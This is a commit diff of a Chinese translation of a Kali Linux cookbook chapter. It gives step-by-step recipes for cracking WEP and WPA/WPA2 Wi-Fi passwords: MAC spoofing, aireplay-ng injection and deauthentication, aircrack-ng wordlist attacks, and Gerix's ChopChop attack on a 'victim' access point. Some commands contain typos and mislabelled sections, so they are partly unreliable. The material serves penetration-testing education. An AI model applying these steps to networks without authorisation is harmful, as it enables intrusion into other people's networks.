提交 755d6104 编写于 作者: W wizardforcel

9.2~9.3

上级 df7bbf6a
......@@ -12,9 +12,9 @@
### 9.1 WEP 无线网络破解
WEP(无线等效协议)自 1999 年起变得流行,并且是用于无线网络的最古老的安全标准。在 2003 年,WEP 被 WPA 以及之后被 WPA2 取代。由于可以使用更加安全的协议,WEP 加密很少使用了。实际上,推荐你永远不要使用 WEP 加密来保护你的网络。有许多已知的方式来攻击 WEP 加密,并且我们在这个秘籍中会探索这些方式之一。
WEP(无线等效协议)于 1999 年诞生,并且是用于无线网络的最古老的安全标准。在 2003 年,WEP 被 WPA 以及之后被 WPA2 取代。由于可以使用更加安全的协议,WEP 加密很少使用了。实际上,推荐你永远不要使用 WEP 加密来保护你的网络。有许多已知的方式来攻击 WEP 加密,并且我们在这个秘籍中会探索这些方式之一。
这个秘籍中,我们会使用 AirCrack 套件来破解 WEP 密码。 AirCrack 套件(或 AirCrack NG)是 WEP 和 WPA 密码破解程序,它会抓取无线网络封包、分析它们,只有使用这些数据来破解 WEP 密码。
这个秘籍中,我们会使用 AirCrack 套件来破解 WEP 密码。 AirCrack 套件(或 AirCrack NG)是 WEP 和 WPA 密码破解程序,它会抓取无线网络封包,分析它们,使用这些数据来破解 WEP 密码。
### 准备
......@@ -57,7 +57,7 @@ WEP(无线等效协议)自 1999 年起变得流行,并且是用于无线
airodump-ng wlan0
```
7. 这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下`Ctrl + C`来停止搜索。选中`BSSID`列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送信号的频道记录下载。你会在`Channel`列中找到这个信息。这里,这个频道是`10`
7. 这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下`Ctrl + C`来停止搜索。选中`BSSID`列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送哪个频道的信号记录下载。你会在`Channel`列中找到这个信息。这里,这个频道是`10`
8. 现在运行`airodump`,并且将所选`BSSID`的信息复制到文件中。我们会使用下列选项:
......@@ -85,7 +85,7 @@ WEP(无线等效协议)自 1999 年起变得流行,并且是用于无线
aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0
```
2. 你的屏幕会开始被流量填满。将这个进程运行一到两分钟,直到你拥有了执行破解的信息。
2. 你的屏幕会开始被流量填满。将它运行一到两分钟,直到你拥有了用来执行破解的信息。
3. 最后我们运行 AirCrack 来破解 WEP 密码。
......@@ -97,4 +97,175 @@ WEP(无线等效协议)自 1999 年起变得流行,并且是用于无线
### 工作原理
在这个秘籍中,我们使用了 AirCrack 套件来破解无线网络的 WEP 密码。AirCrack 是最流行的 WEP 破解工具之一。AirCrack 通过收集 WEP 无线连接的封包来工作,之后它会算术分析数据来破解 WEP 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用`airodump`搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用`aireplay`来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。
在这个秘籍中,我们使用了 AirCrack 套件来破解无线网络的 WEP 密码。AirCrack 是最流行的 WEP 破解工具之一。AirCrack 通过收集 WEP 无线连接的封包来工作,之后它会通过算术分析数据来破解 WEP 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用`airodump`搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用`aireplay`来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。
## 5.2 WPA/WPA2 无线网络破解
WPA(无线保护访问)于 2003 年诞生,并且为保护无线网络和取代过时的旧标准 WEP 而创建。WEP 被 WPA 以及之后的 WPA2 代替。由于存在更加安全的协议,WEP 很少使用了。
这个秘籍中,我们会使用 AirCrack 套件来破解 WPA 密码。 AirCrack 套件(或 AirCrack NG)是 WEP 和 WPA 密码破解程序,它抓取网络封包,分析它们,并使用这些数据破解 WPA 密码。
### 准备
为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。
### 操作步骤
让我们开始使用 AirCrack 来破解WEP 加密的网络会话。
1. 打开终端窗口,并产生无线网络接口的列表:
```
airmon-ng
```
![](img/9-2-1.jpg)
2.`interface`列下,选择你的接口之一。这里,我们使用`wlan0`。如果你的接口不同,例如`mon0`,请将每个提到`wlan0`的地方都换成它。
3. 下面,我们需要停止`wlan0`接口,并把它关闭,便于我们接下来修改 MAC 地址。
```
airmon-ng stop
ifconfig wlan0 down
```
4. 下面,我们需要修改我们接口的 MAC 地址。由于机器的 MAC 地址会在任何网络上标识你的存在,修改机器的标识允许我们隐藏真正的 MAC 地址。这里,我们使用`00:11:22:33:44:55`
```
macchanger --mac 00:11:22:33:44:55 wlan0
```
5. 现在我们需要重启` airmon-ng`
```
airmon-ng start wlan0
```
6. 下面,我们会使用` airodump`来定位附近的可用无线网络。
```
airodump-ng wlan0
```
7. 这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下`Ctrl + C`来停止搜索。选中`BSSID`列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送哪个频道的信号记录下载。你会在`Channel`列中找到这个信息。这里,这个频道是`10`
8. 现在运行`airodump`,并且将所选`BSSID`的信息复制到文件中。我们会使用下列选项:
+ `-c`允许我们选择频道。这里我们选择`10`。
+ `-w`允许我们选择文件名称。这里我们选择`wirelessattack`。
+ `-bssid`允许我们选择我们的`BSSID`。这里,我们从剪贴板上粘贴`09:AC:90:AB:78`。
```
airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0
```
9. 新的窗口会打开,并展示这个命令的输出。保持这个窗口开着。
0. 打开另一个终端窗口,为了尝试组合它们,我们运行`aireplay`。它拥有下列语法:`aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface]`
```
Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0
```
1. 最后我们运行 AirCrack 来破解 WEP 密码。`-w`选项允许我们指定单词列表的位置。我们使用事先命名的`.cap`文件。这里,文件名称是`wirelessattack.cap`
```
Aircrack-ng –w ./wordlist.lst wirelessattack.cap
```
这就结束了。
### 工作原理
在这个秘籍中,我们使用了 AirCrack 套件来破解无线网络的 WPA 密码。AirCrack 是最流行的 WPA 破解工具之一。AirCrack 通过收集 WPA 无线连接的封包来工作,之后它会通过算术分析数据来破解 WPA 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用`airodump`搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用`aireplay`来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。
## 9.3 无线网络自动化破解
这个秘籍中我们会使用 Gerix 将无线网络攻击自动化。Gerix 是AirCrack的自动化 GUI。Gerix 默认安装在 Kali Linux 中,并且能够加速我们的无线网络破解过程。
### 准备
为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。
### 操作步骤
让我们开始使用 Gerix 进行自动化的无线网络破解。首先下载它:
1. 使用`wget`,访问下面的网站并下载 Gerix:
```
wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/ downloads/gerix-wifi-cracker-master.rar
```
2. 文件下载好之后,我们需要从 RAR 文件中解压数据。
```
unrar x gerix-wifi-cracker-master.ra
```
3. 现在,为了保持文件一致,让我们将 Gerix 文件夹移动到` /usr/share `目录下,和其它渗透测试工具放到一起。
```
mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker
```
4. 让我们访问 Gerix 所在的目录:
```
cd /usr/share/gerix-wifi-cracker
```
5. 我们键入下列命令来启动 Gerix:
```
python gerix.py
```
![](img/5-3-1.jpg)
6. 点击`Configuration`(配置)标签页。
7.`Configuration`标签页中,选择你的无线接口。
8. 点击`Enable/Disable Monitor Mode `(开启/进制监控器模式)按钮。
9. 在监控模式启动之后,在` Select Target Network`(选择目标网络)下面,点击` Rescan Networks `(重新扫描网络)按钮。
0. 目标网络的列表会填满。选择无线网络作为目标。这里,我们选择了 WEP 加密的网络。
1. 点击 WEP 标签页。
![](img/5-3-2.jpg)
2.` Functionalities`(功能)中,点击` Start Sniffing and Logging `(开启嗅探和记录)按钮。
3. 点击 `WEP Attacks (No Client)`(WEP 攻击 无客户端)子标签页。
4. 点击` Start false access point authentication on victim `(开启目标上的伪造接入点验证)按钮。
5. 点击`Start the ChopChop attack`(开始断续攻击)按钮。
6. 在打开的终端窗口中,对`Use this packet `(使用这个封包)问题回答`Y`
7. 完成之后,复制生成的`.cap`文件。
8. 点击` Create the ARP packet to be injected on the victim access point`(创建注入到目标接入点的 ARP 封包)按钮。
9. 点击`Inject the created packet on victim access point`(将创建的封包注入到目标接入点)按钮。
0. 在打开的终端窗口中,对`Use this packet `问题回答`Y`
1. 收集了大约 20000 个封包之后,点击`Cracking`(破解)标签页。
2. 点击`Aircrack-ng – Decrypt WEP Password`(解密 WEP 密码)按钮。
这就结束了。
### 工作原理
这个秘籍中,我们使用了 Gerix 来自动化破解无线网络,为获得 WEP 密码。我们以启动 Gerix 并开启监控模式接口来开始这个秘籍。下面,我们从由 Gerix 提供的攻击目标的列表中选择我们的目标。在我们开始嗅探网络流量之后,我们使用 Chop Chop 来生成 CAP 文件。我们最后以收集 20000 个封包并使用 AirCrack 暴力破解 CAP 文件来结束这个秘籍。
使用 Gerix,我们能够自动化破解 WEP 密码的步骤,而不需要手动在终端窗口中键入命令。这是一种非常棒的方式,能够快速高效地破解 WEP 加密的网络。
Markdown is supported
0% .
You are about to add 0 people to the discussion. Proceed with caution.
先完成此消息的编辑!
想要评论请 注册